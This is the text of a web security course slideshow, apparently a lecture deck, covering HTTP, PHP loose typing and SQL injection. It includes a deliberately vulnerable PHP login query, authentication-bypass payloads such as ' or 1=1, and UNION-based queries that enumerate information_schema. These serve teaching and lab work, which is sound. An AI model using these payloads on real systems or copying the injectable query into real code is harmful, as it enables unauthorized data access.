IM620 Web Security - Speaker Deck

Slide 1

Slide 1 text

IM620 Web Security

Slide 2

Slide 2 text

Basic PHP

Slide 3

Slide 3 text

• 動態網⾴開發語⾔ • 執⾏在 Server 上⾯，並將結果傳⾄客⼾端 • Example: • Wordpress • Facebook • CDX Basic PHP

Slide 4

Slide 4 text

• 變數 • 名字前面都會需要加一個 $ • HTTP GET / POST • $_GET • $_POST • Arrays Basic PHP

Slide 5

Slide 5 text

HTTP HyperText Transfer Protocol

Slide 6

Slide 6 text

•HTTP 具有無狀態特性 •通常使用 TCP 協定 •訂定八種請求方式 •訂有回傳狀態碼 •歷史版本 •HTTP 1.0 •HTTP 1.1 •HTTP 2.0 HTTP

Slide 7

Slide 7 text

HTTP 標頭

Slide 8

Slide 8 text

HTTP Header (Request) GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 HTTP Method 請求方式

Slide 9

Slide 9 text

HTTP Header (Request) Request Path 資源位置 GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

Slide 10

Slide 10 text

HTTP Header (Request) HTTP 協定版本 1.1 1.2 2 GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

Slide 11

Slide 11 text

HTTP Header (Request) 存取網站域名 (domain/IP + port) GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

Slide 12

Slide 12 text

HTTP Header (Request) ⽤於辨別作業系統和客⼾端(瀏覽器) GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

Slide 13

Slide 13 text

HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Sep 2020 10 : 44 : 42 GMT Content-Type: text/html; charset=utf-8 Last-Modif i ed: Tue, 04 Aug 2020 16 : 24 : 02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 . . . Status Code

Slide 14

Slide 14 text

Slide 15

Slide 15 text

Slide 16

Slide 16 text

•GET: 向指定的資源發出顯示請求 HTTP Method

Slide 17

Slide 17 text

•GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 HTTP Method 提交的資料

Slide 18

Slide 18 text

•GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 •OPTIONS: 這個方法可使伺服器傳回該資源所支援的所有 HTTP請求方法 HTTP Method

Slide 19

Slide 19 text

•GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 •OPTIONS: 這個方法可使伺服器傳回該資源所支援的所有HTTP請求方法 •HEAD: 和 GET 雷同，但不回傳文本內容 •PUT: 向指定資源位置上傳其最新內容 •DELETE: 請求伺服器刪除Request-URI所標識的資源 •CONNECT: 預留給能夠將連接改為隧道方式的代理伺服器。(HTTP 1.1) •TRACE: 回顯伺服器收到的請求，主要用於測試或診斷 HTTP Method

Slide 20

Slide 20 text

• 200 : 成功 • 300 : 轉址 • 400 : ⽤⼾端錯誤 • 500 : 伺服端錯誤 HTTP 狀態碼

Slide 21

Slide 21 text

URL Uniform Resource Locator

Slide 22

Slide 22 text

URL scheme://User@Domain:Port/Path?Query#Fragment

Slide 23

Slide 23 text

URL scheme://User@Domain:Port/Path?Query#Fragment https://[email protected]:443/shell?cmd=ls#output

Slide 24

Slide 24 text

Ports

Slide 25

Slide 25 text

• 定義在 TCP/IP 裡⾯ • Port 範圍在 1 ~ 65535 • 在 IANA 有定義⼀些 Port 的⽤途  (但是 User 可以⾃訂) Ports

Slide 26

Slide 26 text

• 21: FTP • 22: SSH • 23: Telnet • 80: HTTP • 443: HTTPS • 3306: MySQL • 3389: RDP Ports

Slide 27

Slide 27 text

• GET / POST data • ?a=1&b=2 • $_GET • $a = 1 • $b = 2 Basic PHP

Slide 28

Slide 28 text

• GET / POST data • ?a=1&b=2 • $_POST • $a = 1 • $b = 2 Basic PHP

Slide 29

Slide 29 text

• GET / POST data •?a[]=1&a[]=2&a[]=3 • $_GET • $a = Array(1,2,3) Basic PHP

Slide 30

Slide 30 text

• GET / POST data • a[]=1&a[]=2&a[]=3 • $_POST • $a = Array(1,2,3) Basic PHP

Slide 31

Slide 31 text

Lab Basic PHP

Slide 32

Slide 32 text

• 弱型別 • '87' == 87 ? Basic PHP

Slide 33

Slide 33 text

• 弱型別 • '87' == 87 ? • True • '1e5' == 100e3 ? Basic PHP

Slide 34

Slide 34 text

• 弱型別 • '87' == 87 ? • True • '1e5' == 100e3 ? • True • NULL == 0 == False ? Basic PHP

Slide 35

Slide 35 text

• 弱型別 • '87' == 87 ? • True • '1e5' == 100e3 ? • True • NULL == 0 == False ? • True Basic PHP

Slide 36

Slide 36 text

• 弱型別 • '123' + '456' ? Basic PHP

Slide 37

Slide 37 text

• 弱型別 • '123' + '456' ? • '579' • '123' . '456'？ Basic PHP

Slide 38

Slide 38 text

• 弱型別 • '123' + '456' ? • '579' • '123' . '456'？ • '123456' Basic PHP

Slide 39

Slide 39 text

Basic PHP

Slide 40

Slide 40 text

Basic PHP

Slide 41

Slide 41 text

Basic PHP

Slide 42

Slide 42 text

• Example: Basic PHP

Slide 43

Slide 43 text

• Example: Basic PHP

Slide 44

Slide 44 text

• Example: Basic PHP

Slide 45

Slide 45 text

Basic PHP

Slide 46

Slide 46 text

啊現在的 PHP 都會改用 === 跟 !== 了啊

Slide 47

Slide 47 text

但是 PHP 還有一個潮潮的酷東東

Slide 48

Slide 48 text

• md5([]) Array 🌚

Slide 49

Slide 49 text

• md5([]) • NULL • strcmp([], []) Array 🌚

Slide 50

Slide 50 text

• md5([]) • NULL • strcmp([], []) • NULL • sha1([]) Array 🌚

Slide 51

Slide 51 text

• md5([]) • NULL • strcmp([], []) • NULL • sha1([]) • NULL Array 🌚

Slide 52

Slide 52 text

• Example: Array 🌚

Slide 53

Slide 53 text

• Example: Array 🌚

Slide 54

Slide 54 text

Array 🌚

Slide 55

Slide 55 text

Array 🌚

Slide 56

Slide 56 text

Lab PHP sucks

Slide 57

Slide 57 text

SQL Injection

Slide 58

Slide 58 text

SQL id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac Login users admins

Slide 59

Slide 59 text

SQL id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 60

Slide 60 text

SQL SELECT * FROM users ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 61

Slide 61 text

SQL SELECT * FROM users WHERE username='admin' ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 62

Slide 62 text

SQL SELECT id, password FROM users WHERE username='admin' ; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 63

Slide 63 text

SQL SELECT * FROM users LIMIT 0,1; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 64

Slide 64 text

SQL SELECT * FROM users LIMIT 1,3; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 65

Slide 65 text

SQL injection if (isset($_GET['user']) || isset($_GET['pass'])) { $sql = "SELECT id FROM user WHERE username='". $_GET['user']."' AND password='".$_GET['pass']."'"; $result = $connection->query($sql); if ($result) { $data = $result->fetch(PDO::FETCH_ASSOC); if ($data) { die("success"); } else { die(“failed"); } } else { die("error"); } }

Slide 66

Slide 66 text

Slide 67

Slide 67 text

SQL injection SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";

Slide 68

Slide 68 text

SQL injection SELECT id FROM user WHERE username='admin' AND password='admin'; user = admin pass = admin

Slide 69

Slide 69 text

SQL injection SELECT id FROM user WHERE username=‘admin’;’ AND password='admin'; user = admin’; pass = admin

Slide 70

Slide 70 text

SQL injection SELECT id FROM user WHERE username='' or 1=1 -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

Slide 71

Slide 71 text

所以 SQL injection 通常出現在 SQL 語法拼接作查詢

Slide 72

Slide 72 text

Lab Web3 Login as admin

Slide 73

Slide 73 text

• Union-based • 做合併查詢，可以替換掉原本要查詢的位置，在網頁取得你構造的 SQL 語法所拿的資料 • Boolean-based • 當你在猜字時，可以透過 ASCII 來比較，用 True / False 撈資料 • Time-based • 可以使用 Boolean-based 的方式然後在多去 sleep 一下 SQL injection 種類

Slide 74

Slide 74 text

SQL SELECT * FROM users WHERE id=1; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

Slide 75

Slide 75 text

SQL SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3; id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac 1 2 3

Slide 76

Slide 76 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,2,3; id username password 1 2 3

Slide 77

Slide 77 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,user(),3; id username password 1 root@localhost 3

Slide 78

Slide 78 text

• information_schema MySQL

Slide 79

Slide 79 text

• information_schema • 存有資料庫的中繼資料 MySQL

Slide 80

Slide 80 text

• information_schema • 存有資料庫的中繼資料 • Database Name • Table Name • Column Name MySQL

Slide 81

Slide 81 text

• Database Name • information_schema.schemata • Table Name • information_schema.tables • Column Name • information_schema.columns MySQL

Slide 82

Slide 82 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata; id username password 1 login 3

Slide 83

Slide 83 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='login'; id username password 1 users 3

Slide 84

Slide 84 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3

Slide 85

Slide 85 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users' limit 1,1; id username password 1 username 3

Slide 86

Slide 86 text

SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'; id username password 1 id, user, pass 3